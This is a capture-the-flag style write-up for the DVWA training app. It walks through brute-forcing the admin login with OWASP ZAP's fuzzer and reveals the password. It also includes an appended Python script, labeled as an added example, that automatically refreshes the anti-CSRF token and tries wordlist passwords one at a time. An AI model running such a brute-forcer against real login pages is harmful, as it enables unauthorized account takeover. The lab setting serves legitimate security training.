Intro

Damn Vulnerable Web Application (DVWA) is a PHP/MySQL web application that is damn vulnerable.

In this writeup I work through DVWA's vulnerabilities at its different security levels, starting with the login page.

Setup

docker run --rm -it -p 8000:80 kaakaww/dvwa-docker:latest

Walkthrough

1. Opening http://localhost:8000 (port 8000 from the docker command above) shows the DVWA login page.

Bruteforce Password

1. Capture a login request in ZAP and look at the POST body:

username=admin&password=zap&Login=Login&user_token=6cd51b8a24a524b9349dd75c09c0cfb3

2. Incorrect credentials return a page containing the message "Login failed", which gives a reliable marker to filter on.

3. The user_token is tied to the session and regenerated each time the login page is rendered, so a replayed value is rejected. Tell ZAP to refresh it automatically before every request:

ZAP -> Tools -> Options -> Anti-CSRF -> Add `user_token`

4. Select the password value in the request, open the Fuzzer, and add a small list of sample payloads:

admin
letmein
abcd1234
abc123
password
Password

5. In the fuzzer options, tick Follow Redirects and set the number of concurrent threads to 1. Follow Redirects matters because DVWA answers both a good and a bad login with a redirect, so the distinguishing content is only on the page it redirects to. A single thread matters because each request must carry the fresh user_token from the previous response; parallel requests would race for it and fail the CSRF check.

6. Manage Processors -> Add -> Type: Tag Creator -> Login failed. This tags every response that contains "Login failed", so the one successful attempt is the untagged row.

7. Start the fuzzer and compare the results by tag and response size. All failed attempts return the login page at the same size; the outlier is the hit:

Payload: password
Size: 6096 Bytes
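The seven ZAP steps above, reimplemented as a script. This is an added example, not code from the original writeup: it fetches a fresh user_token before every guess (the Anti-CSRF setting), posts one guess at a time (Threads = 1), follows the redirect, and classifies the landing page by the same "Login failed" string the Tag Creator keyed on. It assumes DVWA is reachable at http://localhost:8000 (the -p 8000:80 mapping from Setup), that the form lives at /login.php, and that a successful login lands on a page with a Logout link; those names are assumptions, not facts from the page.

```python
import re
import urllib.parse
import urllib.request
from http.cookiejar import CookieJar
from typing import Optional

BASE_URL = "http://localhost:8000"   # assumption: the -p 8000:80 mapping from Setup
LOGIN_PATH = "/login.php"             # assumption: stock DVWA layout
USERNAME = "admin"
WORDLIST = ["admin", "letmein", "abcd1234", "abc123", "password", "Password"]

# DVWA renders the token as <input type='hidden' name='user_token' value='...' />.
# Accept either quote style so a reformatted copy of the page still parses.
TOKEN_RE = re.compile(
    r"name=['\"]user_token['\"]\s+value=['\"]([0-9a-f]{32})['\"]"
)


def extract_user_token(html: str) -> Optional[str]:
    """Return the 32-hex-char anti-CSRF token from a login page, or None."""
    m = TOKEN_RE.search(html)
    return m.group(1) if m else None


def build_login_body(username: str, password: str, token: str) -> str:
    """Form-encode one login attempt in the field order ZAP captured."""
    return urllib.parse.urlencode(
        {"username": username, "password": password, "Login": "Login", "user_token": token}
    )


def classify_login_response(body: str) -> str:
    """Classify the page reached after the login redirect is followed.

    A stale token comes back with 'CSRF token is incorrect'; a wrong guess
    comes back with 'Login failed' (the Tag Creator marker); a right guess
    lands on the DVWA main page, which carries a Logout link (assumption
    used here as the success marker).
    """
    if "CSRF token is incorrect" in body:
        return "token_error"
    if "Login failed" in body:
        return "failed"
    if "Logout" in body:
        return "success"
    return "unknown"


def attempt_login(opener, username: str, password: str):
    """One guess: GET a fresh token, POST the guess, redirects followed."""
    url = BASE_URL + LOGIN_PATH
    page = opener.open(url, timeout=10).read().decode("utf-8", "replace")
    token = extract_user_token(page)
    if token is None:
        raise RuntimeError("no user_token found on login page; is this DVWA?")
    data = build_login_body(username, password, token).encode()
    resp = opener.open(url, data=data, timeout=10)   # urllib follows the 302
    body = resp.read().decode("utf-8", "replace")
    return classify_login_response(body), len(body)


def brute_force(username: str, wordlist) -> Optional[str]:
    """Try each password in turn on one session (the Threads = 1 equivalent)."""
    jar = CookieJar()   # keeps PHPSESSID so the token stays bound to our session
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
    for pw in wordlist:
        outcome, size = attempt_login(opener, username, pw)
        print(f"{pw:<12} {outcome:<12} {size} bytes")
        if outcome == "success":
            return pw
        if outcome == "token_error":
            raise RuntimeError("token rejected; session or token handling is broken")
    return None


if __name__ == "__main__":
    hit = brute_force(USERNAME, WORDLIST)
    print("valid password:", hit if hit else "none in wordlist")
```

Run it with the container from Setup up; the per-guess output line is the script's equivalent of the fuzzer's results table, and a "token_error" outcome is the symptom you would see in ZAP if Anti-CSRF handling or the thread count were wrong.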

Solution

1. Username: admin

2. Password: password